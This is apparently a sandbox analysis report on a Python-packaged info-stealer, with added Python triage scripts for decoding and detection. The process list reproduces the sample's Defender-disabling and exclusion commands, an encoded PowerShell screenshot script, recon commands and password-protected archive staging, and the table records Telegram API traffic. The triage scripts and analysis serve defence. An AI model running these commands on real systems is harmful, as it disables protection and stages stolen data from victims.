| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe
"C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maintenance\ste.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6580.tmp" "c:\Users\Admin\AppData\Local\Temp\cjmodovl\CSCDFC7E7C12BCE4A51BE5DBD8CF3DBD10.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\8Svqi.zip" *"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe a -r -hp"Damon@123#" "C:\Users\Admin\AppData\Local\Temp\8Svqi.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
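The process list above shows the whole stealer sequence in plain command lines: a Defender exclusion for the sample's own path, Set-MpPreference switching off real-time, IOAV and script scanning, MpCmdRun -RemoveDefinitions, host recon through tasklist, WMIC and systeminfo, a base64 -EncodedCommand screenshot script, and a password-protected rar archive for staging. The Python below is an added triage script written for this page; it is not part of the sandbox report or of the sample's tooling. It decodes -EncodedCommand blobs (PowerShell expects UTF-16LE, then base64), tags command lines for the tampering, recon and staging patterns, and recovers the rar password from the `-hp` switch. The command lines are copied from the list above; the encoded payload is a short constructed stand-in for the multi-kilobyte screenshot script, and the tag names are the editor's own.

```python
import base64
import re

# Added triage example; not part of the sandbox report or the sample.
# The command lines below are copied from the process list in the report.
DEFENDER_EXCLUSION = (
    "powershell -Command Add-MpPreference -ExclusionPath "
    "'C:\\Users\\Admin\\AppData\\Local\\Temp\\Maintenance\\ste.exe'"
)
DEFENDER_DISABLE = (
    "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
    "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
    "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
    "-SubmitSamplesConsent NeverSend"
)
DEFS_REMOVED = '"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All'
AV_DISCOVERY = (
    "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 "
    "Path AntivirusProduct Get displayName"
)
RAR_STAGING = (
    'C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI25282\\rar.exe a -r -hp"Damon@123#" '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\8Svqi.zip" *'
)

# Constructed stand-in for the report's multi-kilobyte screenshot script; it only
# needs to carry the two .NET calls a detection would key on.
SAMPLE_SCRIPT = (
    "Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms\n"
    "foreach ($s in [System.Windows.Forms.Screen]::AllScreens) { "
    "$g.CopyFromScreen($s.Bounds.Location, [System.Drawing.Point]::Empty, $s.Bounds.Size) }"
)


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


ENCODED_CMD = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_powershell(SAMPLE_SCRIPT)
)

# -EncodedCommand and the abbreviations PowerShell accepts for it.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script behind a powershell -EncodedCommand argument, or None.
    Missing '=' padding is restored in case the blob was cut at the end."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Tag names are the editor's own; each pattern maps to a line in the report's process tree.
RULES = {
    "defender-exclusion": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "defender-disabled": re.compile(
        r"Set-MpPreference.*-Disable(?:RealtimeMonitoring|IOAVProtection|ScriptScanning)", re.I),
    "defender-defs-removed": re.compile(r"MpCmdRun\.exe.*-RemoveDefinitions", re.I),
    "av-discovery": re.compile(r"SecurityCenter2.*AntivirusProduct", re.I),
    "encoded-powershell": _ENC_RE,
    "archive-staging": re.compile(r"\brar\.exe\s+a\b.*-hp", re.I),
    "screenshot-capture": re.compile(r"CopyFromScreen|Screen\]?::AllScreens|Screen\.AllScreens"),
}


def classify(text: str) -> set:
    """Tags for every rule that matches a command line (or a decoded script)."""
    return {tag for tag, rx in RULES.items() if rx.search(text)}


# `rar a -hp<password> <archive>`: -hp encrypts file data and headers, so this
# password is what an analyst needs to open a staged archive recovered later.
_RAR_RE = re.compile(r'-hp"?([^"\s]+)"?\s+"([^"]+)"')


def extract_rar_password(cmdline: str):
    m = _RAR_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def triage_cmdlines(cmdlines):
    """Map each flagged command line to its sorted tags; decoded scripts are
    classified too, so an encoded screenshot routine is still tagged."""
    findings = {}
    for c in cmdlines:
        tags = classify(c)
        decoded = decode_encoded_command(c)
        if decoded:
            tags |= classify(decoded)
        pw = extract_rar_password(c)
        if pw:
            tags.add("archive-password:" + pw[0])
        if tags:
            findings[c] = sorted(tags)
    return findings


if __name__ == "__main__":
    lines = [DEFENDER_EXCLUSION, DEFENDER_DISABLE, DEFS_REMOVED, "tasklist /FO LIST",
             AV_DISCOVERY, ENCODED_CMD, RAR_STAGING]
    for cmd, tags in triage_cmdlines(lines).items():
        print(", ".join(tags), "<-", cmd[:70])
```

Run against the full process list, the only lines that stay unflagged are the bare tasklist, tree, getmac and wmic inventory commands, which is the point: the Defender tampering and the archive staging are the lines worth alerting on, while the recon commands are only suspicious in this combination. The recovered password is what lets an analyst open the `8Svqi.zip` staging archive if it is carved from disk or from a capture of the upload.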
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
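Most of the Network table is background traffic from the Windows image (bing, gstatic) and the reverse-DNS lookups the OS issues for hosts it has just talked to. Only two destinations belong to the sample: ip-api.com on port 80, the external-IP lookup the signature list names, and api.telegram.org over 443, which the report records but does not label; a Telegram API connection from a stealer is the usual shape of a bot-based reporting channel, but that is an inference, not something the page states. The Python below is an added example, not part of the sandbox report: it parses the table, drops the noise, reverses the `in-addr.arpa` names back to addresses, and reports which of the remaining connections were plaintext and which were followed by a reverse lookup. The rows are a subset copied from the table above, and the noise list is the editor's assumption about what a Windows 10 sandbox generates on its own.

```python
import ipaddress
import re

# Added example, not part of the sandbox report. Rows are a subset copied from the
# Network table; NOISE_DOMAINS is the editor's assumption about OS background traffic.
NETWORK_TABLE = """\
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
"""

NOISE_DOMAINS = {"gstatic.com", "www.bing.com", "tse1.mm.bing.net"}

_ROW_RE = re.compile(
    r"^\|\s*(\w{2})\s*\|\s*([\d.]+):(\d+)\s*\|\s*([^|]+?)\s*\|\s*(udp|tcp)\s*\|$")


def parse_rows(table: str):
    """Parse the report's four-column network table into dicts."""
    rows = []
    for line in table.splitlines():
        m = _ROW_RE.match(line.strip())
        if m:
            rows.append({"country": m.group(1), "ip": m.group(2),
                         "port": int(m.group(3)), "domain": m.group(4),
                         "proto": m.group(5)})
    return rows


def ptr_to_ip(name: str):
    """'1.112.95.208.in-addr.arpa' -> '208.95.112.1'; None for anything else.
    Reverse lookups in the table are the OS resolving hosts it just connected to,
    so reversing them shows which connections the host itself noticed."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    ip = ".".join(reversed(octets))
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return None
    return ip


def triage_network(table: str):
    """TCP connections that survive the noise filter, with two hints an analyst
    checks first: whether the channel is plaintext (port 80) and whether the
    destination also shows up as a reverse lookup."""
    rows = parse_rows(table)
    ptr_targets = {ip for ip in (ptr_to_ip(r["domain"]) for r in rows) if ip}
    findings = []
    for r in rows:
        if r["proto"] != "tcp" or r["domain"] in NOISE_DOMAINS:
            continue
        findings.append({
            "domain": r["domain"],
            "dest": f'{r["ip"]}:{r["port"]}',
            "plaintext": r["port"] == 80,
            "ptr_seen": r["ip"] in ptr_targets,
        })
    return findings


if __name__ == "__main__":
    for f in triage_network(NETWORK_TABLE):
        print(f)
```

The plaintext flag matters for response: the ip-api.com request on port 80 is recoverable from a packet capture, while the Telegram traffic on 443 is not, so the staged archive's contents have to be reconstructed from the host (the rar password in the process list) rather than from the wire.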
Files
C:\Users\Admin\AppData\Local\Temp\_MEI25282\python311.dll
| MD5 | 64fe8415b07e0d06ce078d34c57a4e63 |
| SHA1 | dd327f1a8ca83be584867aee0f25d11bff820a3d |
| SHA256 | 5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931 |
| SHA512 | 55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/5096-25-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25282\base_library.zip
| MD5 | 9dc12ea9f7821873da74c772abb280f0 |
| SHA1 | 3f271c9f54bc7740b95eaa20debbd156ebd50760 |
| SHA256 | c5ec59385bfac2a0ac38abf1377360cd1fddd05c31f8a8b4e44252e0e63acb10 |
| SHA512 | a3175c170bbb28c199ab74ad3116e71f03f124d448bf0e9dd4afcacdc08a7a52284cf858cfd7e72d35bd1e68c6ba0c2a1a0025199aeb671777977ea53e1f2535 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_ctypes.pyd
| MD5 | 26e65481188fe885404f327152b67c5e |
| SHA1 | 6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d |
| SHA256 | b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786 |
| SHA512 | 5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
| SHA512 | 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\blank.aes
| MD5 | ea55d3a1748ffe306acf41f8e40f36b8 |
| SHA1 | 8c32bf9b958b576b1fcb8a0871fdb0d3bbdd00d3 |
| SHA256 | a265a607674d83a053bd0d6c293a6d191d012ac979bc1707646104d2ff81a279 |
| SHA512 | da577f2cabcf0748edc1a413079388cac5c9bc13912939e109aa14fa415d3b9041ebf849ce6775d8a2411d81f79f84d433be14debbe53ea3b8647f7e94f29e42 |
memory/5096-48-0x00007FFEAC8E0000-0x00007FFEAC8EF000-memory.dmp
memory/5096-47-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_ssl.pyd
| MD5 | 0c06eff0f04b3193a091aa6f77c3ff3f |
| SHA1 | fdc8f3b40b91dd70a65ada8c75da2f858177ca1b |
| SHA256 | 5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2 |
| SHA512 | 985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_sqlite3.pyd
| MD5 | 00a246686f7313c2a7fe65bbe4966e96 |
| SHA1 | a6c00203afab2d777c99cc7686bab6d28e4f3f70 |
| SHA256 | cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67 |
| SHA512 | c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_socket.pyd
| MD5 | abe1268857e3ace12cbd532e65c417f4 |
| SHA1 | dd987f29aabc940f15cd6bd08164ff9ae95c282f |
| SHA256 | 7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5 |
| SHA512 | 392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_queue.pyd
| MD5 | 3f13115b323fb7516054ba432a53e413 |
| SHA1 | 340b87252c92c33fe21f8805acb9dc7fc3ff8999 |
| SHA256 | 52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2 |
| SHA512 | 6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_lzma.pyd
| MD5 | 8bdd52b7bcab5c0779782391686f05c5 |
| SHA1 | 281aad75da003948c82a6986ae0f4d9e0ba988eb |
| SHA256 | d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a |
